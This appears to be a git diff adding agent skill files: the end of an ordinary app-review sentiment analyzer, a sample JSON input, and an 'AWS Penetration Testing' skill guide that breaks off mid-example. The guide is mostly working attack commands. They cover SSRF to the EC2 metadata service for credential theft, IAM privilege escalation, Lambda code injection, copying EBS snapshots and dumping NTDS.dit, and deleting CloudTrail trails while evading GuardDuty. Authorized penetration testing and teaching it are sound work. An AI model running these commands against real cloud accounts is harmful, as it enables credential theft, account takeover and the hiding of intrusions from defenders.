) -> List[Dict[str, str]]:
|
||||||
|
"""
|
||||||
|
Generate response templates for common review scenarios.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
issue_category: Category of issue ('crash', 'feature_request', 'positive', etc.)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Response templates
|
||||||
|
"""
|
||||||
|
templates = {
|
||||||
|
'crash': [
|
||||||
|
{
|
||||||
|
'scenario': 'App crash reported',
|
||||||
|
'template': "Thank you for bringing this to our attention. We're sorry you experienced a crash. "
|
||||||
|
"Our team is investigating this issue. Could you please share more details about when "
|
||||||
|
"this occurred (device model, iOS/Android version) by contacting support@[company].com? "
|
||||||
|
"We're committed to fixing this quickly."
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'scenario': 'Crash already fixed',
|
||||||
|
'template': "Thank you for your feedback. We've identified and fixed this crash issue in version [X.X]. "
|
||||||
|
"Please update to the latest version. If the problem persists, please reach out to "
|
||||||
|
"support@[company].com and we'll help you directly."
|
||||||
|
}
|
||||||
|
],
|
||||||
|
'bug': [
|
||||||
|
{
|
||||||
|
'scenario': 'Bug reported',
|
||||||
|
'template': "Thanks for reporting this bug. We take these issues seriously. Our team is looking into it "
|
||||||
|
"and we'll have a fix in an upcoming update. We appreciate your patience and will notify you "
|
||||||
|
"when it's resolved."
|
||||||
|
}
|
||||||
|
],
|
||||||
|
'feature_request': [
|
||||||
|
{
|
||||||
|
'scenario': 'Feature request received',
|
||||||
|
'template': "Thank you for this suggestion! We're always looking to improve [app_name]. We've added your "
|
||||||
|
"request to our roadmap and will consider it for a future update. Follow us @[social] for "
|
||||||
|
"updates on new features."
|
||||||
|
},
|
||||||
|
{
|
||||||
|
'scenario': 'Feature already planned',
|
||||||
|
'template': "Great news! This feature is already on our roadmap and we're working on it. Stay tuned for "
|
||||||
|
"updates in the coming months. Thanks for your feedback!"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
'positive': [
|
||||||
|
{
|
||||||
|
'scenario': 'Positive review',
|
||||||
|
'template': "Thank you so much for your kind words! We're thrilled that you're enjoying [app_name]. "
|
||||||
|
"Reviews like yours motivate our team to keep improving. If you ever have suggestions, "
|
||||||
|
"we'd love to hear them!"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
'negative_general': [
|
||||||
|
{
|
||||||
|
'scenario': 'General complaint',
|
||||||
|
'template': "We're sorry to hear you're not satisfied with your experience. We'd like to make this right. "
|
||||||
|
"Please contact us at support@[company].com so we can understand the issue better and help "
|
||||||
|
"you directly. Thank you for giving us a chance to improve."
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
|
||||||
|
return templates.get(issue_category, templates['negative_general'])
|
||||||
|
|
||||||
|
def _calculate_sentiment_score(self, text: str, rating: int) -> float:
|
||||||
|
"""Calculate sentiment score (-1 to 1)."""
|
||||||
|
# Start with rating-based score
|
||||||
|
rating_score = (rating - 3) / 2 # Convert 1-5 to -1 to 1
|
||||||
|
|
||||||
|
# Adjust based on text sentiment
|
||||||
|
positive_count = sum(1 for keyword in self.POSITIVE_KEYWORDS if keyword in text)
|
||||||
|
negative_count = sum(1 for keyword in self.NEGATIVE_KEYWORDS if keyword in text)
|
||||||
|
|
||||||
|
text_score = (positive_count - negative_count) / 10 # Normalize
|
||||||
|
|
||||||
|
# Weighted average (60% rating, 40% text)
|
||||||
|
final_score = (rating_score * 0.6) + (text_score * 0.4)
|
||||||
|
|
||||||
|
return max(min(final_score, 1.0), -1.0)
|
||||||
|
|
||||||
|
def _categorize_sentiment(self, score: float) -> str:
|
||||||
|
"""Categorize sentiment score."""
|
||||||
|
if score > 0.3:
|
||||||
|
return 'positive'
|
||||||
|
elif score < -0.3:
|
||||||
|
return 'negative'
|
||||||
|
else:
|
||||||
|
return 'neutral'
|
||||||
|
|
||||||
|
def _assess_sentiment_trend(self, distribution: Dict[str, float]) -> str:
|
||||||
|
"""Assess overall sentiment trend."""
|
||||||
|
positive = distribution['positive']
|
||||||
|
negative = distribution['negative']
|
||||||
|
|
||||||
|
if positive > 70:
|
||||||
|
return 'very_positive'
|
||||||
|
elif positive > 50:
|
||||||
|
return 'positive'
|
||||||
|
elif negative > 30:
|
||||||
|
return 'concerning'
|
||||||
|
elif negative > 50:
|
||||||
|
return 'critical'
|
||||||
|
else:
|
||||||
|
return 'mixed'
|
||||||
|
|
||||||
|
def _categorize_themes(
|
||||||
|
self,
|
||||||
|
common_words: List[Dict[str, Any]],
|
||||||
|
common_phrases: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, List[str]]:
|
||||||
|
"""Categorize themes from words and phrases."""
|
||||||
|
themes = {
|
||||||
|
'features': [],
|
||||||
|
'performance': [],
|
||||||
|
'usability': [],
|
||||||
|
'support': [],
|
||||||
|
'pricing': []
|
||||||
|
}
|
||||||
|
|
||||||
|
# Keywords for each category
|
||||||
|
feature_keywords = {'feature', 'functionality', 'option', 'tool'}
|
||||||
|
performance_keywords = {'fast', 'slow', 'crash', 'lag', 'speed', 'performance'}
|
||||||
|
usability_keywords = {'easy', 'difficult', 'intuitive', 'confusing', 'interface', 'design'}
|
||||||
|
support_keywords = {'support', 'help', 'customer', 'service', 'response'}
|
||||||
|
pricing_keywords = {'price', 'cost', 'expensive', 'cheap', 'subscription', 'free'}
|
||||||
|
|
||||||
|
for word_data in common_words:
|
||||||
|
word = word_data['word']
|
||||||
|
if any(kw in word for kw in feature_keywords):
|
||||||
|
themes['features'].append(word)
|
||||||
|
elif any(kw in word for kw in performance_keywords):
|
||||||
|
themes['performance'].append(word)
|
||||||
|
elif any(kw in word for kw in usability_keywords):
|
||||||
|
themes['usability'].append(word)
|
||||||
|
elif any(kw in word for kw in support_keywords):
|
||||||
|
themes['support'].append(word)
|
||||||
|
elif any(kw in word for kw in pricing_keywords):
|
||||||
|
themes['pricing'].append(word)
|
||||||
|
|
||||||
|
return {k: v for k, v in themes.items() if v} # Remove empty categories
|
||||||
|
|
||||||
|
def _generate_theme_insights(self, themes: Dict[str, List[str]]) -> List[str]:
|
||||||
|
"""Generate insights from themes."""
|
||||||
|
insights = []
|
||||||
|
|
||||||
|
for category, keywords in themes.items():
|
||||||
|
if keywords:
|
||||||
|
insights.append(
|
||||||
|
f"{category.title()}: Users frequently mention {', '.join(keywords[:3])}"
|
||||||
|
)
|
||||||
|
|
||||||
|
return insights[:5]
|
||||||
|
|
||||||
|
def _categorize_issues(self, issues: List[Dict[str, Any]]) -> Dict[str, List[Dict[str, Any]]]:
|
||||||
|
"""Categorize issues by type."""
|
||||||
|
categories = {
|
||||||
|
'crashes': [],
|
||||||
|
'bugs': [],
|
||||||
|
'performance': [],
|
||||||
|
'compatibility': []
|
||||||
|
}
|
||||||
|
|
||||||
|
for issue in issues:
|
||||||
|
keywords = issue['issue_keywords']
|
||||||
|
|
||||||
|
if 'crash' in keywords or 'freezes' in keywords:
|
||||||
|
categories['crashes'].append(issue)
|
||||||
|
elif 'bug' in keywords or 'error' in keywords or 'broken' in keywords:
|
||||||
|
categories['bugs'].append(issue)
|
||||||
|
elif 'slow' in keywords or 'laggy' in keywords:
|
||||||
|
categories['performance'].append(issue)
|
||||||
|
else:
|
||||||
|
categories['compatibility'].append(issue)
|
||||||
|
|
||||||
|
return {k: v for k, v in categories.items() if v}
|
||||||
|
|
||||||
|
def _calculate_issue_severity(
|
||||||
|
self,
|
||||||
|
categorized_issues: Dict[str, List[Dict[str, Any]]],
|
||||||
|
total_reviews: int
|
||||||
|
) -> Dict[str, Dict[str, Any]]:
|
||||||
|
"""Calculate severity scores for each issue category."""
|
||||||
|
severity_scores = {}
|
||||||
|
|
||||||
|
for category, issues in categorized_issues.items():
|
||||||
|
count = len(issues)
|
||||||
|
percentage = (count / total_reviews) * 100 if total_reviews > 0 else 0
|
||||||
|
|
||||||
|
# Calculate average rating of affected reviews
|
||||||
|
avg_rating = sum(i['rating'] for i in issues) / count if count > 0 else 0
|
||||||
|
|
||||||
|
# Severity score (0-100)
|
||||||
|
severity = min((percentage * 10) + ((5 - avg_rating) * 10), 100)
|
||||||
|
|
||||||
|
severity_scores[category] = {
|
||||||
|
'count': count,
|
||||||
|
'percentage': round(percentage, 2),
|
||||||
|
'average_rating': round(avg_rating, 2),
|
||||||
|
'severity_score': round(severity, 1),
|
||||||
|
'priority': 'critical' if severity > 70 else ('high' if severity > 40 else 'medium')
|
||||||
|
}
|
||||||
|
|
||||||
|
return severity_scores
|
||||||
|
|
||||||
|
def _rank_issues_by_severity(
|
||||||
|
self,
|
||||||
|
severity_scores: Dict[str, Dict[str, Any]]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Rank issues by severity score."""
|
||||||
|
ranked = sorted(
|
||||||
|
[{'category': cat, **data} for cat, data in severity_scores.items()],
|
||||||
|
key=lambda x: x['severity_score'],
|
||||||
|
reverse=True
|
||||||
|
)
|
||||||
|
return ranked
|
||||||
|
|
||||||
|
def _generate_issue_recommendations(
|
||||||
|
self,
|
||||||
|
categorized_issues: Dict[str, List[Dict[str, Any]]],
|
||||||
|
severity_scores: Dict[str, Dict[str, Any]]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate recommendations for addressing issues."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
for category, score_data in severity_scores.items():
|
||||||
|
if score_data['priority'] == 'critical':
|
||||||
|
recommendations.append(
|
||||||
|
f"URGENT: Address {category} issues immediately - affecting {score_data['percentage']}% of reviews"
|
||||||
|
)
|
||||||
|
elif score_data['priority'] == 'high':
|
||||||
|
recommendations.append(
|
||||||
|
f"HIGH PRIORITY: Focus on {category} issues in next update"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _extract_feature_request_text(self, text: str) -> str:
|
||||||
|
"""Extract the specific feature request from review text."""
|
||||||
|
# Simple extraction - find sentence with feature request keywords
|
||||||
|
sentences = text.split('.')
|
||||||
|
for sentence in sentences:
|
||||||
|
if any(keyword in sentence for keyword in self.FEATURE_REQUEST_KEYWORDS):
|
||||||
|
return sentence.strip()
|
||||||
|
return text[:100] # Fallback
|
||||||
|
|
||||||
|
def _cluster_feature_requests(
|
||||||
|
self,
|
||||||
|
feature_requests: List[Dict[str, Any]]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Cluster similar feature requests."""
|
||||||
|
# Simplified clustering - group by common keywords
|
||||||
|
clusters = {}
|
||||||
|
|
||||||
|
for request in feature_requests:
|
||||||
|
text = request['request_text'].lower()
|
||||||
|
# Extract key words
|
||||||
|
words = [w for w in text.split() if len(w) > 4]
|
||||||
|
|
||||||
|
# Try to find matching cluster
|
||||||
|
matched = False
|
||||||
|
for cluster_key in clusters:
|
||||||
|
if any(word in cluster_key for word in words[:3]):
|
||||||
|
clusters[cluster_key].append(request)
|
||||||
|
matched = True
|
||||||
|
break
|
||||||
|
|
||||||
|
if not matched and words:
|
||||||
|
cluster_key = ' '.join(words[:2])
|
||||||
|
clusters[cluster_key] = [request]
|
||||||
|
|
||||||
|
return [
|
||||||
|
{'feature_theme': theme, 'request_count': len(requests), 'examples': requests[:3]}
|
||||||
|
for theme, requests in clusters.items()
|
||||||
|
]
|
||||||
|
|
||||||
|
def _prioritize_feature_requests(
|
||||||
|
self,
|
||||||
|
clustered_requests: List[Dict[str, Any]]
|
||||||
|
) -> List[Dict[str, Any]]:
|
||||||
|
"""Prioritize feature requests by frequency."""
|
||||||
|
return sorted(
|
||||||
|
clustered_requests,
|
||||||
|
key=lambda x: x['request_count'],
|
||||||
|
reverse=True
|
||||||
|
)[:10]
|
||||||
|
|
||||||
|
def _generate_feature_recommendations(
|
||||||
|
self,
|
||||||
|
prioritized_requests: List[Dict[str, Any]]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate recommendations for feature requests."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
if prioritized_requests:
|
||||||
|
top_request = prioritized_requests[0]
|
||||||
|
recommendations.append(
|
||||||
|
f"Most requested feature: {top_request['feature_theme']} "
|
||||||
|
f"({top_request['request_count']} mentions) - consider for next major release"
|
||||||
|
)
|
||||||
|
|
||||||
|
if len(prioritized_requests) > 1:
|
||||||
|
recommendations.append(
|
||||||
|
f"Also consider: {prioritized_requests[1]['feature_theme']}"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _determine_trend_direction(
|
||||||
|
self,
|
||||||
|
rating_change: float,
|
||||||
|
sentiment_change: float
|
||||||
|
) -> str:
|
||||||
|
"""Determine overall trend direction."""
|
||||||
|
if rating_change > 0.2 and sentiment_change > 5:
|
||||||
|
return 'improving'
|
||||||
|
elif rating_change < -0.2 and sentiment_change < -5:
|
||||||
|
return 'declining'
|
||||||
|
else:
|
||||||
|
return 'stable'
|
||||||
|
|
||||||
|
def _generate_trend_insights(
|
||||||
|
self,
|
||||||
|
trends: List[Dict[str, Any]],
|
||||||
|
trend_direction: str
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate insights from trend analysis."""
|
||||||
|
insights = []
|
||||||
|
|
||||||
|
if trend_direction == 'improving':
|
||||||
|
insights.append("Positive trend: User satisfaction is increasing over time")
|
||||||
|
elif trend_direction == 'declining':
|
||||||
|
insights.append("WARNING: User satisfaction is declining - immediate action needed")
|
||||||
|
else:
|
||||||
|
insights.append("Sentiment is stable - maintain current quality")
|
||||||
|
|
||||||
|
# Review velocity insight
|
||||||
|
if len(trends) >= 2:
|
||||||
|
recent_reviews = trends[-1]['total_reviews']
|
||||||
|
previous_reviews = trends[-2]['total_reviews']
|
||||||
|
|
||||||
|
if recent_reviews > previous_reviews * 1.5:
|
||||||
|
insights.append("Review volume increasing - growing user base or recent controversy")
|
||||||
|
|
||||||
|
return insights
|
||||||
|
|
||||||
|
|
||||||
|
def analyze_reviews(
|
||||||
|
app_name: str,
|
||||||
|
reviews: List[Dict[str, Any]]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to perform comprehensive review analysis.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
app_name: App name
|
||||||
|
reviews: List of review dictionaries
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete review analysis
|
||||||
|
"""
|
||||||
|
analyzer = ReviewAnalyzer(app_name)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'sentiment_analysis': analyzer.analyze_sentiment(reviews),
|
||||||
|
'common_themes': analyzer.extract_common_themes(reviews),
|
||||||
|
'issues_identified': analyzer.identify_issues(reviews),
|
||||||
|
'feature_requests': analyzer.find_feature_requests(reviews)
|
||||||
|
}
|
||||||
30
skills/app-store-optimization/sample_input.json
Normal file
30
skills/app-store-optimization/sample_input.json
Normal file
@@ -0,0 +1,30 @@
|
|||||||
|
{
|
||||||
|
"request_type": "keyword_research",
|
||||||
|
"app_info": {
|
||||||
|
"name": "TaskFlow Pro",
|
||||||
|
"category": "Productivity",
|
||||||
|
"target_audience": "Professionals aged 25-45 working in teams",
|
||||||
|
"key_features": [
|
||||||
|
"AI-powered task prioritization",
|
||||||
|
"Team collaboration tools",
|
||||||
|
"Calendar integration",
|
||||||
|
"Cross-platform sync"
|
||||||
|
],
|
||||||
|
"unique_value": "AI automatically prioritizes your tasks based on deadlines and importance"
|
||||||
|
},
|
||||||
|
"target_keywords": [
|
||||||
|
"task manager",
|
||||||
|
"productivity app",
|
||||||
|
"todo list",
|
||||||
|
"team collaboration",
|
||||||
|
"project management"
|
||||||
|
],
|
||||||
|
"competitors": [
|
||||||
|
"Todoist",
|
||||||
|
"Any.do",
|
||||||
|
"Microsoft To Do",
|
||||||
|
"Things 3"
|
||||||
|
],
|
||||||
|
"platform": "both",
|
||||||
|
"language": "en-US"
|
||||||
|
}
|
||||||
402
skills/aws-penetration-testing/SKILL.md
Normal file
402
skills/aws-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,402 @@
|
|||||||
|
---
|
||||||
|
name: AWS Penetration Testing
|
||||||
|
description: This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment.
|
||||||
|
---
|
||||||
|
|
||||||
|
# AWS Penetration Testing
|
||||||
|
|
||||||
|
## Purpose
|
||||||
|
|
||||||
|
Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
|
||||||
|
|
||||||
|
## Inputs/Prerequisites
|
||||||
|
|
||||||
|
- AWS CLI configured with credentials
|
||||||
|
- Valid AWS credentials (even low-privilege)
|
||||||
|
- Understanding of AWS IAM model
|
||||||
|
- Python 3, boto3 library
|
||||||
|
- Tools: Pacu, Prowler, ScoutSuite, SkyArk
|
||||||
|
|
||||||
|
## Outputs/Deliverables
|
||||||
|
|
||||||
|
- IAM privilege escalation paths
|
||||||
|
- Extracted credentials and secrets
|
||||||
|
- Compromised EC2/Lambda/S3 resources
|
||||||
|
- Persistence mechanisms
|
||||||
|
- Security audit findings
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Essential Tools
|
||||||
|
|
||||||
|
| Tool | Purpose | Installation |
|
||||||
|
|------|---------|--------------|
|
||||||
|
| Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` |
|
||||||
|
| SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` |
|
||||||
|
| Prowler | Security auditing | `pip install prowler` |
|
||||||
|
| ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` |
|
||||||
|
| enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` |
|
||||||
|
| Principal Mapper | IAM analysis | `pip install principalmapper` |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Core Workflow
|
||||||
|
|
||||||
|
### Step 1: Initial Enumeration
|
||||||
|
|
||||||
|
Identify the compromised identity and permissions:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Check current identity
|
||||||
|
aws sts get-caller-identity
|
||||||
|
|
||||||
|
# Configure profile
|
||||||
|
aws configure --profile compromised
|
||||||
|
|
||||||
|
# List access keys
|
||||||
|
aws iam list-access-keys
|
||||||
|
|
||||||
|
# Enumerate permissions
|
||||||
|
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
|
||||||
|
```
|
||||||
|
|
||||||
|
### Step 2: IAM Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List all users
|
||||||
|
aws iam list-users
|
||||||
|
|
||||||
|
# List groups for user
|
||||||
|
aws iam list-groups-for-user --user-name TARGET_USER
|
||||||
|
|
||||||
|
# List attached policies
|
||||||
|
aws iam list-attached-user-policies --user-name TARGET_USER
|
||||||
|
|
||||||
|
# List inline policies
|
||||||
|
aws iam list-user-policies --user-name TARGET_USER
|
||||||
|
|
||||||
|
# Get policy details
|
||||||
|
aws iam get-policy --policy-arn POLICY_ARN
|
||||||
|
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
|
||||||
|
|
||||||
|
# List roles
|
||||||
|
aws iam list-roles
|
||||||
|
aws iam list-attached-role-policies --role-name ROLE_NAME
|
||||||
|
```
|
||||||
|
|
||||||
|
### Step 3: Metadata SSRF (EC2)
|
||||||
|
|
||||||
|
Exploit SSRF to access metadata endpoint (IMDSv1):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Access metadata endpoint
|
||||||
|
http://169.254.169.254/latest/meta-data/
|
||||||
|
|
||||||
|
# Get IAM role name
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||||||
|
|
||||||
|
# Extract temporary credentials
|
||||||
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
|
||||||
|
|
||||||
|
# Response contains:
|
||||||
|
{
|
||||||
|
"AccessKeyId": "ASIA...",
|
||||||
|
"SecretAccessKey": "...",
|
||||||
|
"Token": "...",
|
||||||
|
"Expiration": "2019-08-01T05:20:30Z"
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**For IMDSv2 (token required):**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Get token first
|
||||||
|
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
|
||||||
|
"http://169.254.169.254/latest/api/token")
|
||||||
|
|
||||||
|
# Use token for requests
|
||||||
|
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
|
||||||
|
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"
|
||||||
|
```
|
||||||
|
|
||||||
|
**Fargate Container Credentials:**
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Read environment for credential path
|
||||||
|
/proc/self/environ
|
||||||
|
# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...
|
||||||
|
|
||||||
|
# Access credentials
|
||||||
|
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Privilege Escalation Techniques
|
||||||
|
|
||||||
|
### Shadow Admin Permissions
|
||||||
|
|
||||||
|
These permissions are equivalent to administrator:
|
||||||
|
|
||||||
|
| Permission | Exploitation |
|
||||||
|
|------------|--------------|
|
||||||
|
| `iam:CreateAccessKey` | Create keys for admin user |
|
||||||
|
| `iam:CreateLoginProfile` | Set password for any user |
|
||||||
|
| `iam:AttachUserPolicy` | Attach admin policy to self |
|
||||||
|
| `iam:PutUserPolicy` | Add inline admin policy |
|
||||||
|
| `iam:AddUserToGroup` | Add self to admin group |
|
||||||
|
| `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin role |
|
||||||
|
| `lambda:UpdateFunctionCode` | Inject code into Lambda |
|
||||||
|
|
||||||
|
### Create Access Key for Another User
|
||||||
|
|
||||||
|
```bash
|
||||||
|
aws iam create-access-key --user-name target_user
|
||||||
|
```
|
||||||
|
|
||||||
|
### Attach Admin Policy
|
||||||
|
|
||||||
|
```bash
|
||||||
|
aws iam attach-user-policy --user-name my_username \
|
||||||
|
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
|
||||||
|
```
|
||||||
|
|
||||||
|
### Add Inline Admin Policy
|
||||||
|
|
||||||
|
```bash
|
||||||
|
aws iam put-user-policy --user-name my_username \
|
||||||
|
--policy-name admin_policy \
|
||||||
|
--policy-document file://admin-policy.json
|
||||||
|
```
|
||||||
|
|
||||||
|
### Lambda Privilege Escalation
|
||||||
|
|
||||||
|
```python
|
||||||
|
# code.py - Inject into Lambda function
|
||||||
|
import boto3
|
||||||
|
|
||||||
|
def lambda_handler(event, context):
|
||||||
|
client = boto3.client('iam')
|
||||||
|
response = client.attach_user_policy(
|
||||||
|
UserName='my_username',
|
||||||
|
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
|
||||||
|
)
|
||||||
|
return response
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Update Lambda code
|
||||||
|
aws lambda update-function-code --function-name target_function \
|
||||||
|
--zip-file fileb://malicious.zip
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## S3 Bucket Exploitation
|
||||||
|
|
||||||
|
### Bucket Discovery
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Using bucket_finder
|
||||||
|
./bucket_finder.rb wordlist.txt
|
||||||
|
./bucket_finder.rb --download --region us-east-1 wordlist.txt
|
||||||
|
|
||||||
|
# Common bucket URL patterns
|
||||||
|
https://{bucket-name}.s3.amazonaws.com
|
||||||
|
https://s3.amazonaws.com/{bucket-name}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Bucket Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List buckets (with creds)
|
||||||
|
aws s3 ls
|
||||||
|
|
||||||
|
# List bucket contents
|
||||||
|
aws s3 ls s3://bucket-name --recursive
|
||||||
|
|
||||||
|
# Download all files
|
||||||
|
aws s3 sync s3://bucket-name ./local-folder
|
||||||
|
```
|
||||||
|
|
||||||
|
### Public Bucket Search
|
||||||
|
|
||||||
|
```
|
||||||
|
https://buckets.grayhatwarfare.com/
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Lambda Exploitation
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List Lambda functions
|
||||||
|
aws lambda list-functions
|
||||||
|
|
||||||
|
# Get function code
|
||||||
|
aws lambda get-function --function-name FUNCTION_NAME
|
||||||
|
# Download URL provided in response
|
||||||
|
|
||||||
|
# Invoke function
|
||||||
|
aws lambda invoke --function-name FUNCTION_NAME output.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## SSM Command Execution
|
||||||
|
|
||||||
|
Systems Manager allows command execution on EC2 instances:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List managed instances
|
||||||
|
aws ssm describe-instance-information
|
||||||
|
|
||||||
|
# Execute command
|
||||||
|
aws ssm send-command --instance-ids "i-0123456789" \
|
||||||
|
--document-name "AWS-RunShellScript" \
|
||||||
|
--parameters commands="whoami"
|
||||||
|
|
||||||
|
# Get command output
|
||||||
|
aws ssm list-command-invocations --command-id "CMD-ID" \
|
||||||
|
--details --query "CommandInvocations[].CommandPlugins[].Output"
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## EC2 Exploitation
|
||||||
|
|
||||||
|
### Mount EBS Volume
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Create snapshot of target volume
|
||||||
|
aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"
|
||||||
|
|
||||||
|
# Create volume from snapshot
|
||||||
|
aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a
|
||||||
|
|
||||||
|
# Attach to attacker instance
|
||||||
|
aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf
|
||||||
|
|
||||||
|
# Mount and access
|
||||||
|
sudo mkdir /mnt/stolen
|
||||||
|
sudo mount /dev/xvdf1 /mnt/stolen
|
||||||
|
```
|
||||||
|
|
||||||
|
### Shadow Copy Attack (Windows DC)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# CloudCopy technique
|
||||||
|
# 1. Create snapshot of DC volume
|
||||||
|
# 2. Share snapshot with attacker account
|
||||||
|
# 3. Mount in attacker instance
|
||||||
|
# 4. Extract NTDS.dit and SYSTEM
|
||||||
|
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Console Access from API Keys
|
||||||
|
|
||||||
|
Convert CLI credentials to console access:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/NetSPI/aws_consoler
|
||||||
|
aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY
|
||||||
|
|
||||||
|
# Generates signin URL for console access
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Covering Tracks
|
||||||
|
|
||||||
|
### Disable CloudTrail
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Delete trail
|
||||||
|
aws cloudtrail delete-trail --name trail_name
|
||||||
|
|
||||||
|
# Disable global events
|
||||||
|
aws cloudtrail update-trail --name trail_name \
|
||||||
|
--no-include-global-service-events
|
||||||
|
|
||||||
|
# Disable specific region
|
||||||
|
aws cloudtrail update-trail --name trail_name \
|
||||||
|
--no-include-global-service-events --no-is-multi-region-trail
|
||||||
|
```
|
||||||
|
|
||||||
|
**Note:** Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on user-agent. Use Pacu which modifies the user-agent.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Quick Reference
|
||||||
|
|
||||||
|
| Task | Command |
|
||||||
|
|------|---------|
|
||||||
|
| Get identity | `aws sts get-caller-identity` |
|
||||||
|
| List users | `aws iam list-users` |
|
||||||
|
| List roles | `aws iam list-roles` |
|
||||||
|
| List buckets | `aws s3 ls` |
|
||||||
|
| List EC2 | `aws ec2 describe-instances` |
|
||||||
|
| List Lambda | `aws lambda list-functions` |
|
||||||
|
| Get metadata | `curl http://169.254.169.254/latest/meta-data/` |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Constraints
|
||||||
|
|
||||||
|
**Must:**
|
||||||
|
- Obtain written authorization before testing
|
||||||
|
- Document all actions for audit trail
|
||||||
|
- Test in scope resources only
|
||||||
|
|
||||||
|
**Must Not:**
|
||||||
|
- Modify production data without approval
|
||||||
|
- Leave persistent backdoors without documentation
|
||||||
|
- Disable security controls permanently
|
||||||
|
|
||||||
|
**Should:**
|
||||||
|
- Check for IMDSv2 before attempting metadata attacks
|
||||||
|
- Enumerate thoroughly before exploitation
|
||||||
|
- Clean up test resources after engagement
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Examples
|
||||||
|
|
||||||
|
### Example 1: SSRF to Admin
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Find SSRF vulnerability in web app
|
||||||
|
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||||||
|
|
||||||
|
# 2. Get role name from response
|
||||||
|
# 3. Extract credentials
|
||||||
|
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole
|
||||||
|
|
||||||
|
# 4. Configure AWS CLI with stolen creds
|
||||||
|
export AWS_ACCESS_KEY_ID=ASIA...
|
||||||
|
export AWS_SECRET_ACCESS_KEY=...
|
||||||
|
export AWS_SESSION_TOKEN=...
|
||||||
|
|
||||||
|
# 5. Verify access
|
||||||
|
